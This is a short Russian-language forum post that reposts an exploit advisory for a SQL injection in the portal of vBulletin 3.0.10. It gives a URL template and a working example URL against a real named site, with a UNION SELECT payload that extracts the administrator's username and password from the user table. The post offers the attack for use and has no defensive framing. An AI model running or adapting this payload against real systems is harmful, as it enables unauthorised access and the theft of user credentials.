Уязвимость в портале vBulletin Version 3.0.10
Цитата:
################################################## ####
# vBulletin 3.0.10 Version SQL Injection #
# SpC-x #
################################################## ####
# Credit : SpC-X #
# Site : http://www.Cyber-security.org #
################################################## ####
Code :
http://www.target.com/path/portal.ph...ure&featureid=[SQL]
Example :
http://ckknight.wowinterface.com/por...ture&featureid
=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,
password/**/from/**/user/**/where/**/userid=1/*
/SpC-x
|
Источник
Других форумов с установленным порталом гугль не выдаёт.
PS Формально, уязвимость в портале, а не в форуме, поэтому заранее извиняюсь, если запостил не туда. |
